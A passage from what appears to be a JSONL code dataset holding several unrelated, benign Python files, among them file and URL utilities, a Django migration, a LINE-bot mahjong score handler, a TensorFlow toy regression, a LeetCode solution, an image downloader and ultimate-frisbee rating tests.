_md5hash(buf).hexdigest()\n\n\ndef default_release_dirs(*extra) -> list:\n \"\"\" Get default dirs that release executables exist(possible) \"\"\"\n home = str(Path.home()) + os.sep\n possible = ['github', 'bitbucket', 'gitlab', 'develop', 'projects', 'workspace', 'Go']\n for s in set(extra):\n if s not in possible:\n possible.append(s)\n return [home + s for s in possible]\n\n\ndef search_program(name, where):\n \"\"\" Find executable program in possiable dir.\n Search for path in `where` first, then the `default_release_dirs()`.\n \"\"\"\n if isinstance(where, (list, tuple, set)):\n for d in where:\n if not d.endswith(os.sep):\n d += os.sep\n if os.path.isfile(d + name):\n return d + name\n elif isinstance(where, str):\n if not where.endswith(os.sep):\n where += os.sep\n if os.path.isfile(where + name):\n return where + name\n for d in default_release_dirs():\n if not d.endswith(os.sep):\n d += os.sep\n if os.path.exists(d + name):\n return d + name\n return None\n\n\ndef add_sys_path(name:str) -> bool:\n \"\"\" Add name into sys.path \"\"\"\n if name in sys.path:\n return False\n sys.path.insert(0, name)\n return True\n\ndef user_dir():\n \"\"\" Get current user's dir with os.sep \"\"\"\n return os.path.expanduser('~') + os.sep\n\ndef home_dir():\n \"\"\" Get home dir of current user with os.sep \"\"\"\n return str(Path.home()) + os.sep\n\ndef cur_dir():\n \"\"\" Get current dir of fn \"\"\"\n return str(Path(os.path.curdir).absolute())\n\ndef parent_dir(fn):\n \"\"\" Get parent directory of existed filename \"\"\"\n return str(Path(fn).parent.absolute()) + os.sep\n\ndef grand_dir(fn):\n \"\"\" Get grand father directory of existed filename \"\"\"\n return parent_dir(parent_dir(fn))\n\ndef basename(fn):\n \"\"\" Get base name of filename \"\"\"\n return os.path.basename(os.path.realpath(fn))\n\ndef dirname(fn):\n \"\"\" Get directory name of filename with os.sep \"\"\"\n return os.path.dirname(os.path.realpath(fn)) + 
os.sep\n\ndef filetime(fn) -> tuple:\n    \"\"\" Get file time, return (ctime, mtime, atime) \"\"\"\n    assert os.path.exists(fn)\n    fstat = os.lstat(fn)\n    ct, mt, at = fstat.st_ctime, fstat.st_mtime, fstat.st_atime\n    return (localtime(ct), localtime(mt), localtime(at))\n\ndef span_wildcard(path:str, wildcard:str) -> list:\n    \"\"\" Get a list of paths after expanding the wildcard in path \"\"\"\n    # print(os.path.realpath(path))\n    return [str(p) for p in Path(os.path.realpath(path)).glob(wildcard)]\n\ndef span_wildcard_recurse(path:str, wildcard:str) -> list:\n    \"\"\" Same as span_wildcard, but recursive \"\"\"\n    # print(os.path.realpath(path))\n    return [str(p) for p in Path(os.path.realpath(path)).rglob(wildcard)]\n\n\ndef is_valid_dir(*args) -> bool:\n    \"\"\" Check is valid dir \"\"\"\n    for d in args:\n        assert isinstance(d, str)\n        if not os.path.isdir(d):\n            return False\n        if d[0] in ('.', '~'):\n            return False\n        if 'linux' in platform().lower():\n            return d.startswith('/')\n    return True\n\n\ndef scan_dir(path) -> tuple:\n    \"\"\" Like listdir, but not recursive \"\"\"\n    if sys.version_info.minor >= 5:\n        return tuple(os.scandir(path))\n    else:\n        return os.listdir(path)\n\n\ndef file_monitor(filename, interval=0.5, repeat=2) -> bool:\n    \"\"\" Monitor any changes of file, return True if \n        no changes after a specific time (interval * repeat). \"\"\"\n    if os.path.isfile(filename) and os.path.exists(filename):\n        t = filetime(filename)\n        n = os.path.getsize(filename)\n        for _ in range(repeat):\n            sleep(interval)\n            if filetime(filename) != t:\n                return False\n            if n != os.path.getsize(filename):\n                return False\n        return True\n    raise FileNotFoundError(filename)\n    \n\ndef recursive_encode(s:str, level=9, method=[]) -> str:\n    \"\"\" Recursively encode `s` using base64,\n        `level` is the recursion depth, the max value is 32 \"\"\"\n    assert 0 < level <= 32\n    if not isinstance(s, (bytearray, bytes)):\n        s = bytes(s, 'utf-8')\n    if method:\n        for coder in method:\n            s = coder(s)\n        return str(s, 'utf-8')\n    else:\n        if level <= 1:\n            return str(base64.b85encode(s), 'utf-8')\n        return recursive_encode(base64.b64encode(s), level - 1)\n\ndef __recursive_decode(s:str, level) -> str:\n    \"\"\" Recursively decode `s` (encoded by `recursive_encode`) using base64,\n        `level` is the recursion depth, the max value is 32 \"\"\"\n    if not isinstance(s, (bytearray, bytes)):\n        s = bytes(s, 'utf-8')\n    if level <= 1:\n        return str(base64.b64decode(s), 'utf-8')\n    return __recursive_decode(base64.b64decode(s), level - 1)\n\ndef recursive_decode(s:str, level=9, method=[]) -> str:\n    \"\"\" Recursively decode `s` (encoded by `recursive_encode`) using base64,\n        `level` is the recursion depth, the max value is 32 \"\"\"\n    assert 0 < level <= 32\n    if not isinstance(s, (bytearray, bytes)):\n        s = bytes(s, 'utf-8')\n    if method:\n        for coder in method:\n            s = coder(s)\n        return str(s, 'utf-8')\n    else:\n        s = str(base64.b85decode(s), 'utf-8')\n        if level <= 1:\n            return s\n        return __recursive_decode(s, level - 1)\n\n\ndef isotime():\n    \"\"\" Return iso datetime, like 2014-03-28 19:45:59 \"\"\"\n    return strftime('%F %T')\n\ndef is_time(hms_in_24h:str):\n    \"\"\" Check now is the specified time \"\"\"\n    return strftime('%H:%M:%S') == hms_in_24h\n\n\ndef time_meter(src=os.path.basename(__file__)):\n    \"\"\" Print time when entering and leaving the wrapped function \"\"\"\n    def _wrapper(func):\n        @functools.wraps(func)\n        def _call(*args, **kwargs):\n            debug(isotime() + (' %s : %s started...' 
% (src, _call.__name__)))\n            ret = func(*args, **kwargs)\n            debug(isotime() + (' %s : %s finished...' % (src, _call.__name__)))\n            return ret\n        return _call\n    return _wrapper\n\n\ndef make_calendar(year=None) -> list:\n    \"\"\" Return a list containing a date object and weekday name for every day in the `year` \"\"\"\n    if not year:\n        year = datetime.today().year\n    cld = [None]\n    for i in range(1, 13):\n        month = [(None, None)]\n        for j in range(1, 32):\n            try:\n                dt = date(year, i, j)\n                month.append((dt, WEEKDAYS_EN[dt.weekday()]))\n            except ValueError:\n                pass\n        cld.append(month)\n    return cld\n\n\ndef make_week_table(year=None) -> dict:\n    \"\"\" Return a table mapping each day to its week number in a year (always 52 weeks) \"\"\"\n    if not year:\n        year = datetime.today().year\n    cld = make_calendar(year)\n    wdt = {}\n    if cld[1][1][1] == 'Monday':\n        num = 0\n    else:\n        num = 1\n    for m in cld[1:]:\n        for d, w in m:\n            if not d:\n                continue\n            if w == 'Monday':\n                num += 1\n            wdt[d] = num\n    return wdt\n\n\ndef date_delta(y1, m1, d1, y2, m2, d2):\n    \"\"\" Return timedelta object of two dates, eg:\n        d = date_delta(2015, 3, 2, 2016, 3, 2)\n    \"\"\"\n    y1, m1, d1 = int(y1), int(m1), int(d1)\n    y2, m2, d2 = int(y2), int(m2), int(d2)\n    d1 = datetime(y1, m1, d1, 0, 0, 0)\n    d2 = datetime(y2, m2, d2, 0, 0, 0)\n    return d2 - d1 if d2 > d1 else d1 - d2\n\n\ndef time_delta(H1, M1, S1, H2, M2, S2):\n    \"\"\" Return timedelta object of two times, eg:\n        d = time_delta(22, 33, 44, 23, 59, 0)\n    \"\"\"\n    H1, M1, S1 = int(H1), int(M1), int(S1)\n    H2, M2, S2 = int(H2), int(M2), int(S2)\n    d1 = datetime(1970, 1, 1, H1, M1, S1)\n    d2 = datetime(1970, 1, 1, H2, M2, S2)\n    return d2 - d1 if d2 > d1 else d1 - d2\n\n\ndef datetime_delta(y1, m1, d1, H1, M1, S1, y2, m2, d2, H2, M2, S2):\n    \"\"\" Return timedelta object of two datetimes \"\"\"\n    y1, m1, d1, H1, M1, S1 = int(y1), int(m1), int(d1), int(H1), int(M1), int(S1)\n    y2, m2, d2, H2, M2, S2 = int(y2), int(m2), int(d2), int(H2), int(M2), int(S2)\n    d1 = datetime(y1, m1, d1, H1, M1, S1)\n    d2 = datetime(y2, m2, d2, H2, M2, S2)\n    return d2 - d1 if d2 > d1 else d1 - d2\n\n\ndef urlsplit(url:str) -> (str, str, str):\n    \"\"\" Split `url` into 3 parts: host, path without params, params \"\"\"\n    url = trimhttp(url)\n    seps = url.split('?', 1)\n    host = seps[0].split('/', 1)[0]\n    if len(seps) > 1:\n        return host, seps[0], seps[1]\n    else:\n        return host, seps[0], ''\n\ndef urlsplit2(url:bytes) -> (bytes, bytes, bytes):\n    \"\"\" Split `url` into 3 parts: host, path without params, params \"\"\"\n    url = trimhttp2(url)\n    seps = url.split(b'?', 1)\n    host = seps[0].split(b'/', 1)[0]\n    if len(seps) > 1:\n        return host, seps[0], seps[1]\n    else:\n        return host, seps[0], b''\n\n\ndef addhttp(url, s=False):\n    \"\"\" Add 'http://' (or 'https://' if `s`) prefix to url \"\"\"\n    if url[:7] == 'http://':\n        return url\n    elif url[:8] == 'https://':\n        return url\n    return (\"https://\" if s else \"http://\") + url \n\ndef addhttp2(url, s=False):\n    \"\"\" Add 'http://' (or 'https://' if `s`) prefix to url \"\"\"\n    if url[:7] == b'http://':\n        return url\n    elif url[:8] == b'https://':\n        return url\n    return (b\"https://\" if s else b\"http://\") + url \n\n\ndef trimhttp(url):\n    \"\"\" Strip 'http://' or 'https://' prefix from url \"\"\"\n    if url[:7] == 'http://':\n        return url[7:]\n    elif url[:8] == 'https://':\n        return url[8:]\n    return url\n\ndef trimhttp2(url):\n    \"\"\" Strip 'http://' or 'https://' prefix from url \"\"\"\n    if url[:7] == b'http://':\n        return url[7:]\n    elif url[:8] == b'https://':\n        return url[8:]\n    return url\n\n\ndef 
urlpath(url:str) -> str:\n \"\"\" Get url's path(strip params) \"\"\"\n return url.split('?', 1)[0]\n\ndef urlpath2(url:bytes) -> bytes:\n \"\"\" Get url's path(strip params) \"\"\"\n return url.split(b'?', 1)[0]\n\n\ndef urlhost(url:str) -> str:\n \"\"\" Get url's host(domain name) \"\"\"\n return trimhttp(url).split('/', 1)[0]\n\ndef urlhost2(url:bytes) -> bytes:\n \"\"\" Get url's host(domain name) \"\"\"\n return trimhttp2(url).split(b'/', 1)[0]\n\n\ndef try_unquote(s, errors='strict') -> str:\n \"\"\" Unquote url or others strictly, try step:\n first 'utf-8'\n second 'gbk'\n last 'latin-1'\n return None if failed \"\"\"\n for c in ('utf-8', 'gbk', 'latin-1'):\n try:\n return unquote_plus(s, c, errors)\n except:\n continue\n return None\n\n\ndef open_as_bytes_stream(filename) -> _io.BufferedReader:\n \"\"\" If file's size < 2GB, read whole file as BytesIO object \"\"\"\n filesize = os.path.getsize(filename)\n if filesize < MAX_FILE_SIZE_32BIT:\n with open(filename, 'rb') as f:\n return BytesIO(f.read(filesize))\n else:\n return open(filename, 'rb', buffering=BEST_IO_BUFFER_SIZE)\n\n\ndef loadjson(name, objHook=None) -> dict:\n \"\"\" Load json from file and return dict \"\"\"\n try:\n with _io.open(name, encoding='utf-8', errors='replace') as f:\n return json.loads(f.read(), encoding='utf-8', object_hook=objHook)\n except Exception as e:\n if 'BOM' in str(e):\n with _io.open(name, encoding='utf-8-sig', errors='replace') as f:\n return json.loads(f.read(), encoding='utf-8-sig', object_hook=objHook)\n\n\ndef dumpjson(obj:dict, name=None) -> str:\n \"\"\" Dump json(dict) to file \"\"\"\n jstr = json.dumps(obj, indent=4, ensure_ascii=False)\n if name:\n with _io.open(name, 'w') as f:\n f.write(jstr)\n return jstr\n\n\n\nif __name__ == \"__main__\":\n print(\"Identifiers defined by bace3/basic.py:\")\n for line in open(__file__):\n if line[:4] in (\"clas\", \"def \") or line[0].isupper():\n print(line.strip())\n\n\n\n","sub_path":"bace3/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":16254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"38433885","text":"import argparse\nimport codecs\nimport sys\nimport json\n\nreader = codecs.getreader('utf8')\nwriter = codecs.getwriter('utf8')\n\n\ndef write_file(fname, data):\n with open(fname, 'w', encoding='utf-8') as outfile:\n return json.dump(data, reader(outfile), ensure_ascii=False, indent=2)\n\n\ndef read_file(fname):\n f = open(fname, 'r')\n data = json.load(f)\n f.close()\n return data\n\n\nclass classifier:\n\n def __init__(self):\n \"\"\"\n Initializes a new data structure, which is a list of tuples to store data for classification.\n \"\"\"\n self.list_data = {\"authors\": {}, \"emails\": {}, \"description\": \"\", \"corpus\": []}\n\n def add_entry(self, data, label):\n \"\"\"\n adds a new data entry to list of data\n \"\"\"\n # tuple1=(data, label)\n self.list_data[\"corpus\"].append({\"data\": data, \"label\": label})\n\n '''\n\n Add methods to gather_data which contains all data you will need for classification\n\n Add methods to do classification and evaluate it.\n\n '''\n\n\n# the following command was used to produce sample.json from sample.data\n# python3 group_project.py --file sample.json --authors \"jon may\" \"sarik ghazarian\" --description \"knock knock jokes with binary classification by jon of whether the joke was 'funny' to a six year old or 'lame'\" --readfile sample.data --emails jonmay@usc.edu sarik@usc.edu\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Save gathered data into a json file. Read data from saved json file, make a classifier and then evaluate its performance.\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"--file\", nargs='?', required=True, help=\"input/output file\")\n parser.add_argument(\"--authors\", nargs='+', required=True, help=\"authors' names\")\n parser.add_argument(\"--emails\", nargs='+', required=True, help=\"authors' email addresses\")\n parser.add_argument(\"--description\", nargs='+', required=True, help=\"project description\")\n parser.add_argument(\"--readfile\", nargs='?', default=None,\n help=\"tab separated data file that will be encoded into json and written (clobbers --file). if not present, assume we're writing\")\n\n try:\n args = parser.parse_args()\n except IOError as msg:\n parser.error(str(msg))\n\n if args.readfile is not None:\n cls = classifier()\n cls.list_data[\"description\"] = args.description\n for author in args.authors:\n acount = len(cls.list_data[\"authors\"]) + 1\n cls.list_data[\"authors\"][\"author{}\".format(acount)] = author\n for email in args.emails:\n acount = len(cls.list_data[\"emails\"]) + 1\n cls.list_data[\"emails\"][\"email{}\".format(acount)] = email\n\n f = open(args.readfile, 'r')\n for line in f:\n d = {}\n tup = line.strip().split('\\t')\n cls.add_entry(*tup)\n\n outfile = write_file(args.file, cls.list_data)\n else:\n infile = read_file(args.file)\n\n '''\n infile contains all data you need to do classification\n '''\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"jsonfile.py","file_name":"jsonfile.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"292707973","text":"from DomainService import (\n user_service,\n hanchan_service,\n)\nfrom ApplicationService import (\n request_info_service,\n reply_service,\n)\nfrom use_cases.group_line.CalculateUseCase import CalculateUseCase\n\n\nclass AddPointByTextUseCase:\n\n def execute(\n self,\n text: str,\n ) -> None:\n line_group_id = request_info_service.req_line_group_id\n mention_line_ids = request_info_service.mention_line_ids\n\n if len(mention_line_ids) > 0:\n if len(mention_line_ids) == 1 and len(text[1:].split()) >= 2:\n # ユーザー名に空白がある場合を考慮し、最後の要素をポイントとして判断する\n point = text[1:].split()[-1]\n target_line_user_id = mention_line_ids[0]\n else:\n reply_service.add_message(\n 'ユーザーを指定する場合はメンションをつけてメッセージの末尾に点数を入力してください。1回につき1人を指定するようにしてください。')\n return\n else:\n target_line_user_id = request_info_service.req_line_user_id\n point = text\n\n point = point.replace(',', '')\n\n # 入力した点数のバリデート(hack: '-' を含む場合数値として判断できないため一旦エスケープ)\n isMinus = False\n if point[0] == '-':\n point = point[1:]\n isMinus = True\n\n if not point.isdigit():\n reply_service.add_message(\n '点数は整数で入力してください。',\n )\n return None\n\n if isMinus:\n point = '-' + point\n\n hanchan = hanchan_service.add_or_drop_raw_score(\n line_group_id=line_group_id,\n line_user_id=target_line_user_id,\n raw_score=int(point),\n )\n\n points = hanchan.raw_scores\n\n res = [\n f'{user_service.get_name_by_line_user_id(line_user_id)}: {point}'\n for line_user_id, point in points.items()\n ]\n\n reply_service.add_message(\"\\n\".join(res))\n\n if len(points) == 4:\n CalculateUseCase().execute()\n elif len(points) > 4:\n reply_service.add_message(\n '5人以上入力されています。@[ユーザー名] で不要な入力を消してください。'\n )\n\n return\n","sub_path":"src/use_cases/group_line/AddPointByTextUseCase.py","file_name":"AddPointByTextUseCase.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"339881545","text":"# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (C) 2007-2009 The NOC Project\n# See LICENSE for details\n# ---------------------------------------------------------------------\n\"\"\"\n\"\"\"\nfrom south.db import db\nfrom django.db import models\n\n\nclass Migration:\n\n def forwards(self):\n\n # Model 'EventPriority'\n db.create_table('fm_eventpriority', (\n ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),\n ('name', models.CharField(\"Name\",max_length=32,unique=True)),\n ('priority', models.IntegerField(\"Priority\")),\n ('description', models.TextField(\"Description\",blank=True,null=True))\n ))\n # Model 'EventCategory'\n db.create_table('fm_eventcategory', (\n ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),\n ('name', models.CharField(\"Name\",max_length=32,unique=True)),\n ('description', models.TextField(\"Description\",blank=True,null=True))\n ))\n # Mock Models\n EventPriority = db.mock_model(model_name='EventPriority', db_table='fm_eventpriority', db_tablespace='', pk_field_name='id', pk_field_type=models.AutoField)\n EventCategory = db.mock_model(model_name='EventCategory', db_table='fm_eventcategory', db_tablespace='', pk_field_name='id', pk_field_type=models.AutoField)\n\n # Model 'EventClass'\n db.create_table('fm_eventclass', (\n ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),\n ('name', models.CharField(\"Name\",max_length=64)),\n ('category', models.ForeignKey(EventCategory,verbose_name=\"Event Category\")),\n ('default_priority', models.ForeignKey(EventPriority,verbose_name=\"Default Priority\")),\n ('variables', models.CharField(\"Variables\",max_length=128,blank=True,null=True)),\n ('subject_template', models.CharField(\"Subject Template\",max_length=128)),\n ('body_template', models.TextField(\"Body Template\")),\n ('last_modified', models.DateTimeField(\"last_modified\",auto_now=True))\n ))\n # Mock Models\n EventClass = db.mock_model(model_name='EventClass', db_table='fm_eventclass', db_tablespace='', pk_field_name='id', pk_field_type=models.AutoField)\n\n # Model 'EventClassificationRule'\n db.create_table('fm_eventclassificationrule', (\n ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),\n ('event_class', models.ForeignKey(EventClass,verbose_name=\"Event Class\")),\n ('name', models.CharField(\"Name\",max_length=64)),\n ('preference', models.IntegerField(\"Preference\", default=1000))\n ))\n\n # Mock Models\n EventClassificationRule = db.mock_model(model_name='EventClassificationRule', db_table='fm_eventclassificationrule', db_tablespace='', pk_field_name='id', pk_field_type=models.AutoField)\n\n # Model 'EventClassificationRE'\n db.create_table('fm_eventclassificationre', (\n ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),\n ('rule', models.ForeignKey(EventClassificationRule,verbose_name=\"Event Classification Rule\")),\n ('left_re', models.CharField(\"Left RE\",max_length=256)),\n ('right_re', models.CharField(\"Right RE\",max_length=256))\n ))\n\n # Mock Models\n ManagedObject = db.mock_model(model_name='ManagedObject', db_table='sa_managedobject', db_tablespace='', pk_field_name='id', pk_field_type=models.AutoField)\n Event = db.mock_model(model_name='Event', db_table='fm_event', db_tablespace='', pk_field_name='id', pk_field_type=models.AutoField)\n\n # Model 'Event'\n db.create_table('fm_event', (\n 
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),\n            ('timestamp', models.DateTimeField(\"Timestamp\")),\n            ('managed_object', models.ForeignKey(ManagedObject,verbose_name=\"Managed Object\")),\n            ('event_priority', models.ForeignKey(EventPriority,verbose_name=\"Priority\")),\n            ('event_category', models.ForeignKey(EventCategory,verbose_name=\"Event Category\")),\n            ('event_class', models.ForeignKey(EventClass,verbose_name=\"Event Class\")),\n            ('parent', models.ForeignKey(Event,verbose_name=\"Parent\",blank=True,null=True)),\n            ('subject', models.CharField(\"Subject\",max_length=256,null=True,blank=True)),\n            ('body', models.TextField(\"Body\",null=True,blank=True))\n        ))\n\n        # Mock Models\n        Event = db.mock_model(model_name='Event', db_table='fm_event', db_tablespace='', pk_field_name='id', pk_field_type=models.AutoField)\n\n        # Model 'EventData'\n        db.create_table('fm_eventdata', (\n            ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),\n            ('event', models.ForeignKey(Event,verbose_name=\"Event\")),\n            ('key', models.CharField(\"Key\",max_length=64)),\n            ('value', models.TextField(\"Value\",blank=True,null=True)),\n            ('type', models.CharField(\"Type\",max_length=1,choices=[(\">\",\"Received\"),(\"V\",\"Variable\"),(\"R\",\"Resolved\")],default=\">\"))\n        ))\n        db.create_index('fm_eventdata', ['event_id','key','type'], unique=True, db_tablespace='')\n\n        db.send_create_signal('fm', ['EventPriority','EventCategory','EventClass','EventClassificationRule','EventClassificationRE',\n                                     'Event','EventData'])\n\n    def backwards(self):\n        db.delete_table('fm_eventdata')\n        db.delete_table('fm_event')\n        db.delete_table('fm_eventclassificationre')\n        db.delete_table('fm_eventclassificationrule')\n        db.delete_table('fm_eventclass')\n        db.delete_table('fm_eventcategory')\n        db.delete_table('fm_eventpriority')\n","sub_path":"fm/migrations/0002_event.py","file_name":"0002_event.py","file_ext":"py","file_size_in_byte":5913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"511220625","text":"\n\nclass Solution:\n def commonChars(self, A):\n dict = {chr(a) : 0 for a in range(97, 123)}\n min_dict = {chr(a) : 0x3f3f for a in range(97, 123)}\n alphabate = [chr(a) for a in range(97, 123)]\n length = len(A)\n res = []\n\n\n if length == 0:\n return res\n for word in A:\n temp_min_dict = {chr(a) : 0 for a in range(97, 123)}\n for alpha in word:\n dict[alpha] += 1\n temp_min_dict[alpha] += 1\n for alpha in alphabate:\n min_dict[alpha] = min(min_dict[alpha], temp_min_dict[alpha])\n\n for item in dict:\n # print(alphabate[item])\n if dict[item] >= length:\n if min_dict[item] != 0:\n for _ in range(0, min_dict[item]):\n res.append(item)\n\n return res\n\nif __name__ == '__main__':\n s = Solution()\n input = [\"cool\",\"lock\",\"cook\"]\n print(s.commonChars(input))\n","sub_path":"source code/Weekly Contest 126-1.py","file_name":"Weekly Contest 126-1.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"231652686","text":"nS= float(input('aantal deeltjes X: '))\n\nNa = (6.020 * (10 ** 23))\nNS = nS * Na\n\nMS = 32.06\nmS = MS * nS\n\nprint(mS)\nprint(NS)\n\n##################################################\n\n# deeltjes vragen\nn_x = float(input('geef het aantal deeltjes zwavel: '))\n\n# gegevens\nm_x = 32.06\nn_a = 6.020 * (10 ** 23)\n\n# formules\nmx = m_x * n_x\nnx = n_x * n_a\n\n# uitvoer\nprint(mx)\nprint(nx)","sub_path":"04-Variabelen/Avogadro.py","file_name":"Avogadro.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"541365454","text":"import tensorflow as tf\nimport numpy as np\n\n\n# import matplotlib as plt\n\n\ndef add_layer(inputs, in_size, out_size, activation_function=None):\n \"\"\"\n 神经层函数\n :param inputs:输入值\n :param in_size:输入的大小\n :param out_size:输出的大小\n :param activation_function:激励函数\n :return:\n \"\"\"\n with tf.name_scope('layer'):\n with tf.name_scope('Weights'):\n Weights = tf.Variable(\n tf.random_normal([in_size, out_size]),\n name='W'\n )\n with tf.name_scope('biases'):\n biases = tf.Variable(\n tf.zeros([1, out_size]) + 0.1,\n name='b'\n )\n with tf.name_scope('Wx_plus_b'):\n # Wx_plus_b = tf.matmul(inputs, Weights) + biases # Wx_plus_b是神经网络未激活的值,tf.matmul()是矩阵的乘法\n Wx_plus_b = tf.add(\n tf.matmul(inputs, Weights),\n biases) # Wx_plus_b是神经网络未激活的值,tf.matmul()是矩阵的乘法\n \"\"\"\n 当激励函数为空时,Wx_plus_b输出就是当前的预测值,\n 不为None时候,就把Wx_plus_b传入到激励函数中去\n \"\"\"\n if activation_function is None:\n output = Wx_plus_b\n else:\n output = activation_function(Wx_plus_b,)\n\n return output\n\n\nif __name__ == '__main__':\n # 1.准备数据\n x_data = np.linspace(-1, 1, 300, dtype=np.float32)[:, np.newaxis]\n noise = np.random.normal(0, 0.05, x_data.shape).astype(np.float32)\n y_data = np.square(x_data) - 0.5 + noise # 定义方程\n\n # 2.利用占位符定义我们所需的神经网络的输入\n with tf.name_scope('inputs'):\n xs = tf.placeholder(tf.float32, [None, 1], name='x_in')\n ys = tf.placeholder(tf.float32, [None, 1], name='y_in')\n\n # 3.定义神经层(输入层、隐藏层、输出层)\n # 构建输入层1个,隐藏层10个,输出层1个的神经网络\n\n # 3.1定义隐藏层\n l1 = add_layer(xs, 1, 10, activation_function=tf.nn.relu)\n # 3.定义输出层(此时的输入就是隐藏层的输出——l1)\n prediction = add_layer(l1, 10, 1, activation_function=None)\n\n with tf.name_scope('loss'):\n loss = tf.reduce_mean(\n tf.reduce_sum(\n tf.square(ys - prediction),\n reduction_indices=[1])\n )\n\n # 让机器学习提升它的准确率\n with tf.name_scope('train'):\n train_step = tf.train.GradientDescentOptimizer(0.1).minimize(loss) # 梯度下降算法\n\n # 初始化变量\n init = tf.global_variables_initializer()\n\n # 定义session\n # with tf.Session() as sess:\n # sess.run(init)\n sess = tf.Session()\n writer = tf.summary.FileWriter(\"logs/\", tf.get_default_graph())\n sess.run(init)\n # 训练,并显示图像\n\n # fig = plt.figure()\n # ax = fig.add_subplot(1, 1, 1)\n # ax.scatter(x_data, y_data)\n # plt.ion() # 本次运行请注释,全局运行不要注释\n # plt.show()\n\n for i in range(2000):\n sess.run(train_step, feed_dict={xs: x_data, ys: y_data})\n if i % 50 == 0:\n # try:\n # ax.lines.remove(lines[0])\n # except Exception:\n # pass\n prediction_value = sess.run(prediction, feed_dict={xs: x_data})\n # plot the prediction\n # lines = ax.plot(x_data, prediction_value, 'r-', lw=5)\n # plt.pause(0.1)\n","sub_path":"ch01/test02.py","file_name":"test02.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"344469309","text":"from fractions import *\n\n# n=10000\n# sum=0\n# for i in range(1,n+1):\n# sum+=Fraction(n,n**2+i**2)\n# print(sum)\n# print(4*sum.numerator/sum.denominator)\n\nfrom decimal import *\n# print(getcontext())\n# n=100000000\n# sum=0\n# for i in range(1,n+1):\n# sum+=Decimal(n)/Decimal(n**2+i**2)\n# print(4*sum)\n# getcontext().prec=10\nn=1000000\npro=1\nfor i in range(3,n,2):\n pro*=Decimal(i**2-1)/Decimal(i**2)\nprint(4*pro)","sub_path":"python/za/getpdf/pi.py","file_name":"pi.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"516225167","text":"# -*- coding: utf-8 -*-\r\n\r\nimport urllib.request\r\n\r\nurl = 'http://mblogthumb2.phinf.naver.net/MjAxODAxMDRfNjQg/MDAxNTE1MDYwMTIxMTU0.1ZIh5H2dnH-ID_eNF2A6YScmvDMOmPMzXYoAbLkElH0g.1l0psKqkW7GsYoGO9s1mEj2j6O-DWzviQo71UOvKNXIg.JPEG.cafeeurope/shutterstock_543297418.jpg?type=w2'\r\n\r\n# 특정 URL로 요청을 수행하기 위한 Request 객체 생성\r\n# 실제 요청이 실행되지 않음(정보만 저장하는 객체)\r\nurl_request = urllib.request.Request(url)\r\n# 실제 요청을 수행하고, 요청의 결과값에 접근할 수 있는 변수 선언\r\nurl_connect = urllib.request.urlopen(url_request)\r\n# 응답받은 데이터의 크기 값(바이트)\r\ndata_size = url_connect.length\r\n\r\n# 한번에 수신할 데이터의 바이트 크기\r\nbuffer_size = 256\r\n# 저장할 파일명\r\nfileName = \"./download_03.jpg\"\r\nwith open(fileName, \"wb\") as f :\r\n # 다운로드 대상의 데이터를 버퍼의 크기만큼\r\n # 지속적으로 읽어들여 전체 데이터를 저장할 때까지\r\n # 반복을 수행\r\n while True :\r\n # 버퍼의 크기만큼 read 기능을 수행\r\n data = url_connect.read(buffer_size)\r\n # 데이터를 모두 읽어온 경우 반복을 중지\r\n if not data :\r\n break\r\n \r\n write_size = f.write(data)\r\n print(write_size)\r\n\r\nurl_connect.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"day_09/web_file_download/web_file_download_03.py","file_name":"web_file_download_03.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"356119965","text":"# test_ultimate.py\n#\n# Right now this has simple tests. In the future, this\n# could hold proper unit tests.\n\nimport pandas as pd\nimport ultimate\nfrom ultimate import (\n Team,\n Game,\n Tournament,\n utils\n)\nfrom ultimate.utils import get_default_parameters\n\nfrom ultimate.tournament import (\n play_eight_team_single_elimination_bracket,\n play_twelve_team_tournament,\n)\nfrom ultimate.team import (\n import_teams,\n get_top_teams_from_region,\n create_teams_from_dataframe,\n)\n\n\n# Get parameters for men's division\nmens_p_a_offense, mens_k, mens_rating_diff_to_victory_margin, game_to = get_default_parameters(\n \"men\"\n)\n\nprint(f\"mens_p_a_offense: {mens_p_a_offense}, mens_k: {mens_k}, game_to: {game_to}\")\n\np_a_offense = 0.7\n\nprint(f\"Using p_a_offense = {p_a_offense}\")\n\n\n#\n# Tests for Team class\n#\nucla = Team(name=\"UCLA\", rating=2200, nickname=\"Smaug\")\nucsb = Team(name=\"UCSB\", rating=2100, nickname=\"Black Tide\")\nucsd = Team(name=\"UCSD\", rating=2000, nickname=\"Air Squids\")\ncal = Team(name=\"Cal\", rating=1900, 